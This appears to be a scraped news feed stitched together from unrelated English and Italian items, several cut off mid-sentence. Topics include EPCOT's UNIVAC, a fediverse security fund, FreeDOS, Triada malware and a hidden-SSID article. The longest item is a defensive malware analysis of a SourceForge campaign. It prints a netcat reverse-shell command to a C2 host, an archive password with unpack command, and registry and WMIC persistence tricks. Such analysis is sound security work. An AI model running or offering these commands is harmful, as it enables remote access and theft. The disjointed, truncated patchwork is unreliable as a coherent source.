Even if you aren’t a Disney fan, you probably know about EPCOT — Experimental Prototype Community of Tomorrow — a Disney attraction that promised a glimpse of the future. [ErnieTech] takes a glimpse at the UNIVAC computer that ran the operation in the 1980s. A lot of schools had UNIVAC 1100-series computers back in those days, so while you don’t hear as much about them as, say, IBM 360s, there are hordes of people who have used the 1100s, even if they don’t remember it.
EPCOT opened in 1982, and it not only ran the attraction but was also visible as part of the exhibit’s ambiance. They even used the Pepper’s Ghost illusion to superimpose a little man on top of the equipment.
Sperry used the relationship with Disney for promotional purposes. We’ve never found a good emulator for the 1100s. The UNIVAC had a 36-bit word and 6-bit characters. We’d love to see something like Hercules that could support Exec 8.
The UNIVAC originated with the Remington Rand company, which had bought Eckert-Mauchly Computer Corporation. Remington Rand later merged with the Sperry Corporation to become Sperry Rand. Eventually, the company reverted to the Sperry name before merging with Burroughs in 1986 to form UNISYS — a company that still exists today.
A new security fund for the fediverse, and the Lemmy developers held an AMA.
The News
The Nivenly Foundation, the organisation that administers the Hachyderm.io instance, is opening a new security fund to sponsor contributors who disclose security vulnerabilities. All software has security vulnerabilities, and the fediverse is no exception. The recent Pixelfed vulnerability, which affected non-Pixelfed servers, is a clear example of how fediverse software can make software vulnerabilities more complex due to the interaction between different software platforms.
The Nivenly Fediverse Security Fund will sponsor $250 USD for vulnerabilities that are rated as high risk (7-9 CVSS score) and $500 USD for vulnerabilities with a critical score (9+ CVSS). The program will run until the end of September 2025. Nivenly members “hold a member vote to determine if we want to continue the program, and to establish a longer-term committee to steward and maintain the program.”
Last week, I wrote how Pixelfed’s vulnerability actually showed three different problems: The main problem is Pixelfed’s software vulnerability itself, but there were also two other problems: other software like Mastodon do not make it clear which risk comes with their private posts feature. And once a leak like this one happens, very few fediverse software admins communicated to their users that they might have been affected.
A security fund contributes to combating software vulnerabilities, but it can also help with communication to the rest of the fediverse once a vulnerability is found. It incentives that standard industry practices regarding software vulnerability get followed, and make communication clearer to a wider audience. For example, if Pixelfed’s recent vulnerability had gotten a CVSS classification, it might have been easier to make the severity of the vulnerability explicit to other fediverse software admins. In turn, this might have made it more likely that server admins would communicate the situation with their users.
In last week’s email essay I also wrote about how the fediverse is missing governance infrastructure that connects the various independent nodes and communities. One way to view the fediverse is as a response to centralised Big Tech platforms. These platforms have centralised governance, and are under the control of few people. The fediverse’s response to this is to build a social network that consists of tens of thousands of independent communities, all with their own governance structure. The fediverse has been successful in decentralising the single entity that oversees a social network into many pieces that all oversee a small portion of the network. But it has struggled to build a governance structure that ties all these individual pieces together again.
The Nivenly Fediverse Security Fund is a good example of this problem: software security impacts all the thousands of independent fediverse communities, but there is no overarching structure to collaborate and improve the security. It took one server taking the initiative into their own hands and provide a service for the entire network, at their own cost. Ideally, communities would collaborate on such a security fund instead. Nivenly’s announcement does leave space for such a future direction of the fund, saying that they are open to “establish a longer-term committee to steward and maintain the program”.
Note: if you sign up for my email newsletter, you get a weekly essay about the open social web that I do not publish anywhere else. You can sign up right here:
The Lemmy developers, Dessalines and nutomic, held an Ask Me Anything recently, and here are some of the answers that stood out to me:
Lemmy is working towards their 1.0 release. This is currently expected to be in the fall, although nutomic also says that “these things always take longer than expected”. He also expects some instances like lemmy.ml already to upgrade some months before.
One of the main features for Lemmy 1.0 is private communities, where only approved accounts can browse and posts to the community. This type of closed group functionality is in high demand, and both Mastodon and Pixelfed have tried to implement it. Mastodon got a grant for it, but the proof-of-concept code has been sitting there since 2022. Pixelfed has announced and teased a group feature multiple times over the year and showed screenshots of it, but it also is not publicly available yet.
Lemmy posts are interoperable with Mastodon, but the interoperability is not great: a Lemmy post appears on Mastodon as the title plus the URL. There has been many conversations about how Mastodon handles content from other platforms, with no changes so far. In this AMA, nutomic is explicit in saying that it is up to Mastodon to change this. While Mastodon seems open to the idea, and has been in conversations with developers from platforms like Ghost and NodeBB on how to show their content better on Mastodon, there has been little indication that Mastodon is taking steps towards making Lemmy content also better visible on Mastodon.
On the subject of how Lemmy can grow, Dessalines describes it as an organic progress, saying: “niche communities on reddit will keep getting fed up with the changes, and migrate to lemmy.” Nutomic describes a similar dynamic for fedi and Bluesky more broadly, saying that he expects that over the long term the fediverse might grow in a similar manner: “when the Bluesky admins make decisions that the community doesnt like, and then there may be another migration wave to the Fediverse”. Both replies indicate Lemmy’s vision of how the project can grow in the long run: stay consistently working on your product, and because platforms like Lemmy are not beholden to investors, they can have a longer lifespan, and outlive platforms who are beholden to shareholder expectations.
Grouping of communities (similar to PieFed’s topics or Reddit’s multireddits) “will be implemented soon“.
Ahoy! is a one-day conference for the European Social Web, and will be held on April 24th 2025 in Hamburg, Germany. The conference is mainly focused on Bluesky and the AT Protocol, and has some super fascinating speakers of people who are in the forefront of building new communities on the open social web. If you’re around I can definitely recommend it. I’ll be doing some interviews with people there, so if you are considering joining, let me know and we can say hi!
That’s all for this week, thanks for reading! You can subscribe to my newsletter to get all my weekly updates via email, which gets you some interesting extra analysis as a bonus, that is not posted here on the website. You can subscribe below:
Nelle ultime tre settimane, al ministero delle Imprese e del made in Italy il team dello sportello per l'attrazione degli investimenti esteri ha iniziato a raccogliere una serie di informazioni per produrre poi un dossier da recapitare sulla scrivania del ministro, Adolfo Urso. Il gruppo ha bussato alla porta delle Regioni, per farsi indicare se ci sono zone che stanno andando in saturazione per numero di data center (come la Lombardia, dove si concentrano impianti per 23,3 GW di consumi sui 40 installati complessivamente lungo lo Stivale) o aree che intendono orientare a questi progetti.
Al ministero delle Imprese e del made in Italy un team sta raccogliendo dati da Regioni, Demanio e altri enti per impostare un approccio univoco agli investimenti esteri in centri di elaborazione dati
Per chi volesse saperne di più su quanto e cosa scambiano UE e USA nei loro rapporti commerciali.
In sintesi, l'UE importa in prevalenza servizi ed esporta in prevalenza prodotti. Gli scambi tra UE e USA rappresentano da soli il 30% degli scambi mondiali. L'UE ha un "utile" di 48 miliardi di euro (ovvero, esportazioni - importazioni = 48 mld)
Partiamo da un presupposto. Essere parte della Nato è un privilegio che – come tutti i privilegi – comporta anche delle responsabilità. Dopo la brutale aggressione della Russia all’Ucraina, dopo quanto accaduto il 7 ottobre in Israele, è divenuto urgente parlare di
@Informatica (Italy e non Italy 😁) Il Signalgate ha messo in evidenza una delle contraddizioni più insidiose della nostra epoca digitale: l’uso di strumenti concepiti per garantire il massimo livello di riservatezza che, se utilizzati in modo disinvolto o privo di
Che l'essere umano è l'anello debole della catena di sicurezza te lo dicono in un qualsiasi corso propedeutico basato sulla sicurezza, non solo informatica. Lo diceva anche l'istruttore di scuola guida.
@Informatica (Italy e non Italy 😁) Dal presidente della Repubblica Mattarella alla presidente del Consiglio Meloni, online i numeri di telefono privati dei vertici dello Stato: è quanto ha
"The army of millions and millions of people screwing in little, little screws to make iPhones, that kind of thing is going to come to America."#iPhone #Apple
Even in 2025 there are still many applications for a simple Disk Operating System (DOS), whether this includes running legacy software (including MS-DOS games & Windows 3.x), or (embedded) systems running new software where the overhead of a full-fat Linux or BSD installation would be patently ridiculous.
This is where the FreeDOS project provides a modern, fully supported DOS, with the recent 1.4 release adding a whole range of features and updates to existing components like the FreeCOM command shell. This is the first stable release since 1.3 was released in 2022.
FreeDOS saw its first release in 1994 and has become the de facto replacement for MS-DOS — featuring many improvements to make it work well on modern hardware and a package manager to manage installed software much like on Linux & BSD. The new kernel didn’t quite make it into this release, but it and some other items will be available in the monthly test builds.
You can download the new 1.4 release here, with live & installer CD images, a USB installer and even a Floppy Edition available. System requirements include an (Intel) x86 CPU, a BIOS (or legacy UEFI mode), 640 kB of RAM and 20 MB of storage.
La banda ha distribuito la maggior parte delle banconote e monete false in Austria, Belgio, Francia, Germania e Spagna
I membri di un gruppo criminale coinvolto nella produzione di banconote in euro contraffatte di alta qualità sono stati arrestati in un'operazione transfrontaliera, che è stata sostenuta da Europol. L'inchiesta è stata condotta dai carabinieri italiani e ha coinvolto anche autorità provenienti da Austria, Belgio, Francia, Germania e Spagna. Gli investigatori ritengono che il gruppo criminale abbia contraffatto banconote per un valore stimato di 180 000 EUR. Va rimarcato che l’ #Armadeicarabinieri possiede un proprio assetto specialistico, il Comando Antifalsificazione Monetaria, che risale al 1992, quando, in ottemperanza al quadro della ripartizione degli obiettivi tra le varie Forze di Polizia, fu riconosciuto all’Arma dei Carabinieri il consolidato interesse nel settore del falso nummario, costituendo il Nucleo Operativo Antifalsificazione Monetaria, poi elevato a Comando di Corpo, e riconosciuto con Regolamento del Consiglio Europeo Autorità Nazionale nel settore per l’Arma dei Carabinieri (G.U. Unione Europea del 10 marzo 2009). Nel corso dell’operazione, svoltasi tra Lecce e Padova, sono state rinvenute e sequestrate 600 banconote in euro contraffatte in tagli da 10, 20, 50 e 100 EUR per un valore totale di circa 50.000 EUR, e 3 contraffattori sono stati arrestati in Italia. L'inchiesta, iniziata nel 2024, ha rivelato che un'organizzazione criminale che operava nel sud Italia distribuiva grandi quantità di banconote false da 10, 20, 50 e 100 EUR in tutta la zona euro. In particolare, Austria, Belgio, Francia, Germania e Spagna hanno ricevuto la maggior parte della moneta falsa.
Il gruppo criminale ha mostrato un alto livello di competenza tecnica e organizzazione interna. Il leader della banda ha venduto le banconote contraffatte tramite una piattaforma di messaggistica online, con gli acquirenti che hanno effettuato pagamenti in criptovaluta. Una volta confermati i pagamenti, le banconote false sono state inviate tramite il normale servizio postale. Gli investigatori hanno anche scoperto che lo stesso gruppo criminale aveva istituito una zecca illegale per la moneta da 2 euro nel nord Italia. Le autorità hanno quindi smantellato la zecca, insieme a una tipografia per banconote in euro contraffatte nell'Italia meridionale.
Durante l'inchiesta, Europol ha facilitato lo scambio di informazioni, sostenuto finanziariamente e coordinato diverse attività operative. Gli analisti di Europol hanno anche fornito supporto analitico per identificare il paese in cui venivano distribuite le banconote. Il giorno dell'azione, Europol ha inviato tre esperti in Italia per fornire supporto tecnico e controllare le informazioni operative contro le banche dati di Europol e i sistemi della Banca centrale europea. I reati finanziari sono uno degli elementi comuni delle principali minacce identificate da Europol, nella sua “Valutazione della minaccia di criminalità grave e organizzata dell'UE” (#EUSOCTA). Queste minacce stanno progressivamente destabilizzando l'UE e sono sfruttate online, poiché le reti criminali operano gradualmente tramite le infrastrutture digitali e online, comprese le piattaforme di messaggistica, come questa operazione ha dimostrato. Hanno partecipato all'indagine: Austria: polizia federale (CIS), Belgio: polizia federale (OCRFM), Francia: polizia nazionale (OCRFM), Germania: polizia federale (BKA), Italia: Carabinieri (CCAFM), Spagna: Brigada de Investigación Banco de España (BIBE, polizia spagnola)
One of the things that’s stopping us from re-using old phones, of course, is the lack of easy access to the peripherals. On the average phone, you’ve got one USB port and that’s it. The Citronics dev provides all sorts of connectivity: 4x USB 2.0, 1x Ethernet 10/100M, and a Raspberry Pi Header (UART, SPI, I2C, GPIO). At the same time, for better or worse, they’ve done away with the screen and its touch interface, and the camera too, but they seem to be keeping all of the RF capabilities.
The whole thing runs Linux, which means that this won’t work with every phone out there, but projects like PostmarketOS and others will certainly broaden the range of usable devices. And stripping off the camera and screen has the secondary advantages of removing the parts that get most easily broken and have the least support from custom Linux distros.
We wish we had more details about the specifics of the break-out boards, but we like the idea. How long before we see an open-source implementation of something similar? There are so many cheap used and broken cellphones out there that it’s certainly a worthwhile project!
Gli specialisti di Kaspersky Lab hanno scoperto una nuova versione del malwareTriada. Il malware è stato trovato sui nuovi dispositivi Android. Secondo l’azienda, solo dal 13 al 27 marzo 2025, più di 2.600 utenti in diversi Paesi hanno incontrato la nuova versione di Triada.
Gli esperti scrivono che la nuova versione di Triada è distribuita nel firmware dei dispositiviAndroid infetti e si trova nel framework di sistema. Ciò significa che il malware può penetrare in ogni processo dello smartphone della vittima.
Il malware ha ampie funzionalità e offre agli aggressori opportunità pressoché illimitate di controllare il gadget, ad esempio è in grado di:
dirottare gli account degli utenti nei servizi di messaggistica istantanea e nei social network, in particolare Telegram e TikTok;
inviare segretamente messaggi presumibilmente per conto della vittima su WhatsApp e Telegram, e poi cancellarli per cancellare le tracce;
rubare criptovalute sostituendo gli indirizzi dei portafogli crittografici nelle applicazioni richieste;
monitorare l’attività della vittima nei browser e sostituire i link;
sostituire i numeri durante le chiamate (per reindirizzare l’abbonato al contatto necessario agli aggressori);
controllare gli SMS (intercettare, inviare ed eliminare i messaggi);
consentire l’invio di SMS premium per ricevere servizi a pagamento;
scaricare ed eseguire altri programmi sullo smartphone infetto;
bloccare le connessioni di rete, ad esempio per interferire con il funzionamento dei sistemi antifrode.
“Il Trojan Triada è noto da molto tempo e rimane ancora una delle minacce più complesse e pericolose per Android. La sua nuova versione penetra nel firmware degli smartphone prima ancora che i gadget raggiungano le mani degli utenti. È probabile che a un certo punto la catena di fornitura venga compromessa, quindi i negozi potrebbero non sapere nemmeno di vendere smartphone basati su Triada. Allo stesso tempo, gli autori della nuova versione di Triada stanno monetizzando attivamente i loro sforzi. Sulla base dell’analisi delle transazioni, sono stati in grado di trasferire circa $ 270.000 in diverse criptovalute sui loro portafogli crittografici. Tuttavia, in realtà, questa cifra potrebbe essere più alta, poiché gli aggressori hanno preso di mira anche Monero, una criptovaluta non rintracciabile”, commenta Dmitry Kalinin, esperto di sicurezza informatica presso Kaspersky Lab.
Si segnala che gli smartphone infetti possono essere acquistati presso negozi online non autorizzati, ma non viene specificato quali. Ricordiamo che non è la prima volta che i ricercatori avvertono che Triada può essere preinstallato sui dispositivi Android, che finiscono per essere infettati fin dal primo momento.
Ad esempio, nel 2018, gli specialisti di Doctor Web avevano lanciato l’allarme in merito alla scoperta di 42 modelli di smartphone Android economici infettati da Triada. E nel 2023, il ricercatore indipendente sulla sicurezza informatica Daniel Milisic ha segnalato un malware preinstallato su vari dispositivi.
Di solito, in questi casi si parla di dispositivi economici e gadget di provenienza molto dubbia. Per questo motivo, gli esperti raccomandano di acquistare gli smartphone solo da rivenditori autorizzati e di installare soluzioni di sicurezza per una maggiore tranquillità.
Nel conflitto ucraino sia le forze russe che quelle ucraine stanno facendo sempre più spesso ricorso a fibre ottiche cablate per i collegamenti di controllo dei droni aerei First-person-view (Fpv). Tali collegamenti non possono infati essere disturbati dalle apparecchiature di guerra elettronica, e non
Il più grande stanziamento per la Difesa statunitense dalla Seconda guerra mondiale, questa l’idea di Donald Trump per potenziare le Forze armate e rilanciare la dottrina Peace through strength. “Abbiamo approvato un bilancio, vi piacerà sentirlo, che si aggira
@Informatica (Italy e non Italy 😁) Sono due le vulnerabilità scoperte e possono causare alterazioni nel funzionamento dei sistemi anticollisione in uso nei velivoli di aviazione civile. Ecco come sono state rilevate e perché le patch sono urgenti L'articolo Vulnerabilità
In 2023 the FBI quietly arrested a notorious money launderer called ElonmuskWHM. Then the FBI secretly ran his operation for nearly a year to catch (and give money to) more criminals.#Features
I mutati scenari di guerra stanno travolgendo l’ordine mondiale creato dopo la fine dell’Unione Sovietica. La globalizzazione sia dei diritti che dell’economia è di fatto finita. Come affronta questa fase la sinistra politica nei vari paesi? Ne parliamo con Roberto Musacchio già parlamentare europeo Marga ferrè – co presidente Transform europe Marco Grispigni Conduce Fabio [...]
I mutati scenari di guerra stanno travolgendo l'ordine mondiale creato dopo la fine dell'Unione Sovietica. La globalizzazione sia dei diritti che dell'economia
Secondo gli inquirenti, Urban, era un membro chiave di uno dei gruppi di hacker più aggressivi degli ultimi anni. Scattered Spider è diventato famoso per l’utilizzo del SIM Swapping, un metodo che consente di prendere il controllo del numero di telefono della vittima e di aggirare l’autenticazione a due fattori. Grazie a questa tecnica il gruppo ha avuto accesso a portafogli crittografici, sistemi aziendali e documenti.
Urban e i suoi complici hanno operato tra agosto 2022 e marzo 2023. Durante questo periodo, secondo l’accusa, sono riusciti a rubare milioni di dollari in criptovaluta, nonché a penetrare nell’infrastruttura IT di grandi aziende, da cui sono stati rubati dati riservati. Durante la perquisizione, a casa di Urban sono stati sequestrati beni digitali per un valore di 2,89 milioni di dollari, conservati sul suo computer di casa.
Secondo i documenti del caso, tre imputati sono stati arrestati, mentre la sorte degli altri due resta sconosciuta. Si stima che i danni totali causati dalle azioni del gruppo siano compresi tra 9,5 e 25 milioni di dollari. Urban si è impegnato a risarcire più di 13 milioni di dollari a favore di più di 30 vittime e ha inoltre rinunciato a tutti i fondi digitali sequestrati.
Gli investigatori hanno scoperto che sotto gli pseudonimi “Sosa”, “Elijah” e “King Bob”, Urban, insieme ad altri membri della “comunità”, era attivamente coinvolto nell’hacking di account, negli attacchi di phishing e nell’utilizzo di dati rubati per ottenere l’accesso ai portafogli crittografici. In un caso, ha hackerato l’account del conglomerato mediatico americano AOL, ha eseguito con successo uno scambio di SIM tramite l’operatore AT&T e ha rubato circa 374 mila dollari.
Durante gli interrogatori, Urban ha confermato di aver ricevuto criptovaluta esclusivamente tramite attività criminali nell’ambito di Scattered Spider. A sole 16 vittime sono stati rubati oltre 2,6 milioni di dollari. Secondo le sue stime, tra gennaio 2021 e marzo 2023 ha guadagnato personalmente diversi milioni di dollari e ha preso parte a furti per importi ancora maggiori.
In passato i giornalisti avevano anche collegato Urban ad attacchi contro musicisti famosi e a fughe di notizie di album inediti. Secondo l’atto d’accusa, avrebbe collaborato con Ahmed Hossam Elbadewi, Evans Osiebo, Joel Evans, Tyler Buchanan e altri. Tra le vittime figurano aziende operanti nei settori dell’intrattenimento, delle telecomunicazioni, delle tecnologie cloud e dei servizi di criptovaluta.
Scattered Spider ha colpito anche MGM e Caesars nel 2023, così come gli attacchi informatici a Coinbase, Twilio, Mailchimp, LastPass, Riot Games e Reddit. Secondo i dati La recente campagna di phishing del gruppo Group-IB ha portato alla compromissione di circa 10.000 account di 136 organizzazioni.
Le autorità statunitensi sottolineano che i membri di Scattered Spider sono madrelingua inglese. Ciò a conferito loro un vantaggio nell’ingegneria sociale. Hanno utilizzato con successo tattiche di Man in the Middle e attacchi di phishing tramite SMS,
Famo er foco questo fine settimana nelle Puglie, attese temperature incandescenti dalle Murge fino alla terra te lu sule, te lu mare e te lu ientu, accorrete in massa, se divertimo, bim! 🙌😄
@Notizie dall'Italia e dal mondo Iran, Iraq e Arabia Saudita responsabili del 91 per cento delle esecuzioni. La pena capitale è usata come strumento di repressione contro manifestanti e gruppi etnici. Aumento delle esecuzioni per reati legati alla droga L'articolo Rapporto Amnesty. Pena di morte nel
Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge, a popular website providing software hosting, comparison, and distribution services. The site hosts numerous software projects, and anyone can upload theirs. One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project. The description and contents of officepackage provided below were also taken from GitHub.
Description of the “officepackage” project
Few know that projects created on sourceforge.net get a sourceforge.io domain name and web hosting services. Pages like that are well-indexed by search engines and appear in their search results.
Example of a search query and results containing officepackage.sourceforge.io
The project under investigation has been assigned the domain officepackage.sourceforge[.]io, but the page displayed when you go to that domain looks nothing like officepackage on sourceforge.net. Instead of the description copied from GitHub, the visitor is presented with an imposing list of office applications complete with version numbers and “Download” buttons.
The project as seen on the officepackage.sourcefoge.io domain
Hovering over one of the buttons reveals a seemingly legit URL in the browser status bar: https[:]//loading.sourceforge[.]io/download. It is easy to make the mistake of associating that URL with officepackage, as the buttons are on that project’s page. However, the loading.sourceforge.io domain suggests a different project on sourceforge.net, named loading.
URL associated with the “Download” button
Clicking the link redirects to a page with yet another “Download” button, this time in English.
Page for downloading the suspicious archive
Clicking that button finally downloads a roughly seven-megabyte archive named vinstaller.zip. This raises some red flags, as office applications are never that small, even when compressed.
The infection chain: from searching for office software to downloading an installer
The downloaded archive contains another password-protected archive, installer.zip, and a Readme.txt file with the password.
Contents of vinstaller.zip
Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer. Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes. After we stripped the junk bytes, its true size was 7 megabytes.
Contents of installer.zip
Running the installer creates several files, with two being of interest to us: UnRAR.exe (a console archive utility) and a password-protected archive named 51654.rar. The installer then executes an embedded Visual Basic script. Attackers have long distributed password-protected archives along with unpacking utilities, passing the password via the command line. However, this case has an intermediary step. The installer files lack an archive password. Instead, to continue the infection chain, the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub. This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.
The infection chain: from launching the installer to downloading the confvk batch script
Here is a breakdown of how the batch script works. First, it checks for an existing infection by searching for the AutoIt interpreter at a specific path. If AutoIt is found, the script deletes itself and exits. If not, the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.
If both checks pass, the script unpacks the RAR archive and runs two PowerShell scripts within its code. "%ProgramData%\dist\UnRAR.exe" x -y -p147852369 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\"
Command to unpack the RAR archive executed by the batch file
One of the PowerShell scripts sends a message to a certain chat using the Telegram API. The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.
Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script
The other PowerShell script downloads another batch file, confvz, to process the files that were extracted from the RAR archive.
Contents of the RAR archive
The contents of the archive can be seen in the screenshot above. Below is a summary of each file.
File
Description
Input.exe
AutoIt script interpreter
Icon.dll
Clean dynamic-link library with a compressed AutoIt script appended to it
Kape.dll
Clean dynamic-link library with a compressed AutoIt script appended to it
ShellExperienceHost.exe
Netcat network utility executable
libssl-1_1.dll
Netcat dependency dynamic-link library
vcruntime140.dll
Netcat dependency dynamic-link library
libcrypto-1_1.dll
Netcat dependency dynamic-link library
The confvz batch file creates three subdirectories at %ProgramData% and moves the unpacked archive files into those. The first subdirectory receives Input.exe and Icon.dll, the second gets another Input.exe copy with Kape.dll, and the third gets all netcat files. The batch file then creates ini.cmd and init.cmd batch scripts at %USERPROFILE%\Cookies\ to run the files it copied. These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll (both containing compressed AutoIt scripts) as arguments.
Contents of the confvz batch file
Next, confvz generates keys in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\*. These link to the ini.cmd and init.cmd batch files. The keys allow running files using shortened names. For example, the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"::"%USERPROFILE%\Cookies\ini.cmd launches ini.cmd when running install.exe. Similarly, start.exe is registered as a link to init.exe, and Setup.exe links to the system utility %WINDIR%\System32\oobe\Setup.exe, normally launched during OS installation. We will revisit this utility later.
Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter without intermediate batch files.
Additionally, as a backup autostart method, confvz adds this registry key: "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe"::Debugger="%WINDIR%\System32\cmd.exe /c start start.exe" This runs a debugger when MicrosoftEdgeUpdate.exe is started. The debugger is set to execute start.exe, which, based on the earlier registry keys, points to init.cmd.
Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds. While disabled by default in more recent Windows versions, WMIC still functions in older systems.
The handler executes the following command: ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection. This essentially creates a remote command line with apap[.]app:445 as the C2 server.
Finally, confvz creates a file: %WINDIR%\Setup\Scripts\ErrorHandler.cmd This is a custom script you can build in Windows to streamline troubleshooting during OS installation. If a critical error occurs, the %System32%\oobe\Setup.exe utility finds and executes this file. However, the attackers have found a way to exploit it for automatic startup. They achieve this by again using the operating system’s built-in WMIC utility to establish an event filter that triggers the handler every 300 seconds. The handler is specified as %WINDIR%\System32\cmd.exe /c start Setup.exe, while Setup.exe, according to the registry keys created earlier, references the utility %WINDIR%\System32\oobe\Setup.exe, which executes ErrorHandler.cmd upon launch. The ErrorHandler.cmd file contains a short PowerShell script that uses the Telegram API to retrieve and execute a text string. This is another remote command line, but its output is not sent anywhere.
The infection chain: from executing confvk to setting up all the auto-start methods
The key malicious actions in this campaign boil down to running two AutoIt scripts. Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker. ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own. Users of crypto wallets typically copy addresses instead of typing them. If the device is infected with ClipBanker, the victim’s money will end up somewhere entirely unexpected.
Victims
The officepackage.sourceforge[.]io site has a Russian interface, suggesting a focus on Russian-speaking users. Our telemetry indicates that 90% of potential victims are in Russia, where 4,604 users encountered the scheme between early January and late March.
Takeaways
Distributing malware disguised as pirated software is anything but new. As users seek ways to download applications outside official sources, attackers offer their own. They keep looking for new ways to make their websites look legit. The scheme described here exploits SourceForge feature of creating a sourceforge.io subdomain for each sourceforge.net repository.
The persistence methods are worthy of note as well. Attackers secure access to an infected system through multiple methods, including unconventional ones. While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.
We advise users against downloading software from untrusted sources. If you are unable to obtain some software from official sources for any reason, remember that seeking alternative download options always carries higher security risks.
We know you’ve seen them: the time-lapses that show a 3D print coming together layer-by-layer without the extruder taking up half the frame. It takes a little extra work compared to just pointing a camera at the build plate, but it’s worth it to see your prints materialize like magic.
Usually these are done with a plugin for OctoPrint, but with all due respect to that phenomenal project, it’s a lot to get set up if you just want to take some pretty pictures. Which is why [Whopper Printing] put together the LayerLapse. This small PCB is designed to trigger your DSLR or mirrorless camera once its remotely-mounted hall effect sensor detects the presence of a magnet. The remote hall effect sensor. The idea is that you just need to stick a small magnet to your extruder, add a bit of extra G-code that will park it over the sensor at the end of each layer, and you’re good to go. There’s even a spare GPIO pin broken out should you want to trigger something else on each layer of your print. Admittedly we can’t think of anything else right now that would make sense, other than some other type of camera, but we’re sure some creative folks out there could put this feature to use.
Currently, [Whopper Printing] is selling the LayerLapse as a finished product, though it does sound like a kit version is in the works. There’s also instructions for building a DIY version of the hardware using your microcontroller of choice. Whether you buy or build the hardware, the firmware is available under the MIT license for your tinkering pleasure.
Being hardware hackers, we appreciate the stand-alone nature of this solution. But if you’re already controlling your printer through OctoPrint, you’re probably better off just setting up one of the available time-lapse plugins.
@Informatica (Italy e non Italy 😁) Rsync è un tool open source che consente di effettuare in maniera semplice ed efficiente il backup dei dati sincronizzando i file e le cartelle tra la directory sorgente e la directory di destinazione, sia in locale che
@Notizie dall'Italia e dal mondo "Zona cuscinetto", così la chiamano a Tel Aviv. Ma per l'esercito israeliano è una nuova «Hiroshima». Ieri almeno 42 morti, tra cui un reporter di Palestine Today Tv Immagini strazianti L'articolo A Gaza il “perimetro” della morte. E un attacco choc
L' 11 febbraio 2023 facemmo un sit-in per la liberazione di Assange davanti all'ambasciata australiana a Roma. Vennero anche Laura e Inti, due attori che fecero una toccante performance per Julian. Ieri mattina con serenità e a casa, Laura ha lasciato il Corpo dopo la tremenda malattia. Le funzioni si terranno a mercoledì 9 aprile alle 15 a Roma, alla chiesa degli Artisti Santa Maria in Montesanto. Chiunque voglia venire a dare un saluto a Laura ed eventualmente partecipare con una breve testimonianza artistica dopo la funzione nel piazzale antistante alla chiesa può segnalarlo qui. Riposa in Pace Laura, nel paradiso di coloro che non si arrendono mai.
L' 11 febbraio 2023 facemmo un sit-in per la liberazione di Assange davanti all'ambasciata australiana a Roma.
Vennero anche Laura e Inti, due attori che fecero una toccante performance per Julian.
La sicurezza, soprattutto quando si parla di reti WiFi, è spesso oggetto di fraintendimenti e luoghi comuni. In questa serie di articoli della nostra Rubrica WiFI, vogliamo sfatare alcuni dei falsi miti più diffusi. Offrendo spiegazioni chiare, dati concreti e consigli pratici. L’obiettivo è aiutarti a muoverti con maggiore consapevolezza nel mondo delle connessioni senza fili
In ogni articolo affronteremo un mito, ne analizzeremo le origini, presenteremo evidenze tecniche e concluderemo con le nostre considerazioni e suggerimenti.
Cominciamo da uno dei più comuni:nascondere il nome della rete (SSID) è davvero un modo efficace per aumentare la sicurezza?
Come Funziona:
Nascondere la rete WiFi significa semplicemente disabilitare la trasmissione del SSID (Service Set Identifier) nei beacon frame. Ovvero disabilitare i segnali periodici inviati dall’access point per annunciare la presenza della rete WiFi ai dispositivi vicini.
In pratica, il nome della rete non compare più nella lista delle reti disponibili. Tuttavia, questa misura può essere considerata “puramente cosmetica” e non offre alcuna reale protezione, anzi può diventare un punto debole.
Vediamo cosa succede nel dettaglio:
L’access point smette di annunciare attivamente la rete: Disabilitando il broadcast del SSID, l’AP continua a inviare i beacon frame1, ma il campo SSID viene lasciato vuoto o impostato come “null”. Questo fa sì che il nome della rete sembri nascosto.
I client devono inviare richieste attive per trovare la rete: I client configurati per connettersi a una rete nascosta non possono più scoprirla passivamente. Devono quindi inviare probe request2 attive per cercare quella rete specifica, includendo nel pacchetto proprio l’SSID.
L’SSID è incluso in chiaro nelle probe request: Anche se l’AP non annuncia più la rete, i dispositivi client rivelano comunque l’SSID ogni volta che tentano di connettersi. Queste richieste contengono il nome della rete in chiaro e possono essere facilmente intercettate.
Processo di connessione e relative informazioni transitano in chiaro: Le probe request e le relative risposte non sono cifrate. Questo significa che chiunque stia ascoltando il traffico WiFi – con strumenti liberamente disponibili e di facile utilizzo – può rilevare il nome della rete nascosta in pochi secondi.
⚠️ Questo video è a scopo educativo! Non utilizzarlo per attività illegali o senza autorizzazione.⚠️
In questo video realizzato da Matteo Brandi vogliamo dare un evidenza pratica su:
✅ Come funzionano le reti WiFi nascoste
✅ Quali strumenti usare per rilevare un SSID nascosto
✅ Come scoprire il nome della rete in modo semplice e pratico
Conclusione
